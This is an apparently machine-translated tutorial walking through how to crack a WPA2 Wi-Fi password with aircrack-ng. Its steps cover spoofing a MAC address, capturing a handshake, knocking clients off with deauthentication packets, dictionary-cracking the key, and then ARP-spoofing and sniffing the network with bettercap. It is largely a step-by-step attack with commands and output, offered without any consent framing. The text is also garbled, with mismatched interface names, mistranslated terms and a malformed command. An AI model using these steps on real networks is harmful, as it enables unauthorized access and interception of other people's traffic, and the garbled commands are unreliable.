WIFI is used everywhere from home, cafe and even public places. So everywhere is an ideal place for hackers to hack Wifi. So in this article, I will simulate the process of hackers hacking Wifi passwords using Linux for you to understand.
Necessary tools to hack Wifi password
- Debian-based Linux operating system.
- Laptop and usb WIFI support “Monitor Mode“. You can buy this wifi usb.
- Tool aircrack-ng, install by command “apt install aircrack-ng“
- Tool to change MAC address. You can download the available tools here or read the tutorial on how to change the MAC address using python here.
Change Mac address
Each system component has a physical static location allotted by the manufacturer. This static location is called the MAC (Media get to control) address. The Mac address is used to recognize other system related utilities for data transfer reasons. It would be better to change Mac address before wifi attack. We can change it using macchanger.
We need to get the interface name:
ip addr show
And change the MAC address
$ip link set wlp7s7 down $macchanger -m DD:DD:DD:DD:DD:DD wlp7s9 $ip link set wlp7s7 up
Sniff wifi packets
All packets will be sent to us, in a normal mode called “Managed Mode”. But as a programmer we have to catch wifi packets. “Oversaw Mode” cannot capture the packet. To catch the packet, we have to change the mode to “Screen”. We will see the current mode with the command:
$iwconfig lo no wireless extensions. wlp7s9 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=16 dBm
You can see we are in “Managed. So let’s change it to “Monitor” mode:
$airmon-ng start wlp7s9
Run the iwconfig command again, it will show “Mode: Monitor” and the current interface is “wlp7s9mon”.
Airodump-ng is a product of the Aircrack-ng group. Packet-by-packet capture can be done using parcel sniffer. We have to filter all wifi networks.
As it is now, we will catch the packet. First, we need to be aware of the number of APs (Access Points) around us:
$airodump-ng wlp7s7mon BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID BB:12:FF:38:BB:88 -46 6 0 0 5 260 WPA2 CCMP PSK Hacked $airodump-ng --bssid BB:12:FF:38:BB:88 --channel 5--write Hacked.cap wlp7s9mon
The problem is that we have to wait until a new client accesses the AP. We don’t know when someone will connect. To make the job easier, we can de-authenticate every client/user. This attack will disconnect everyone from the wifi they are on.
$aireplay-ng --deauth 100 -a BB:12:FF:38:BB:88 -c DD:DD:DD:DD:DD:DD wlp7s9mon
This command will disconnect the person from wifi access for a while and the person will reconnect soon.
Using Dictionary Attack
Time to crack the password. We only need one file “Hacked.cap-01”
To crack a password, you need a password list file to perform a dictionary attack.
$aircrack-ng Hacked.cap-01 -w Hack_Password.txt Aircrack-ng 1.5.2
We just found the password. Now we should be able to connect to wifi.
The wifi password was hacked, then what?
Once connected to the AP, we can find all the addresses associated with this network.
In case we run the command “arp – a”, at that point we will be able to see all associated MAC and IP addresses.
We can use bettercap to evaluate traffic.
./bettercap bettercap v2.26.1 (built for Linux amd64 with go1.11.6) [nhập ‘help’ để biết danh sách các lệnh]
192.168.8.0/24 > 192.168.8.4 » net.sniff on 192.168.8.0/24 > 192.168.8.4 » arp.spoof on 192.168.8.0/24 > 192.168.8.4 » [02:39:24] [net.sniff.dns] dns
We can perform some more advanced attacks after connecting to the access point like MITM . attack.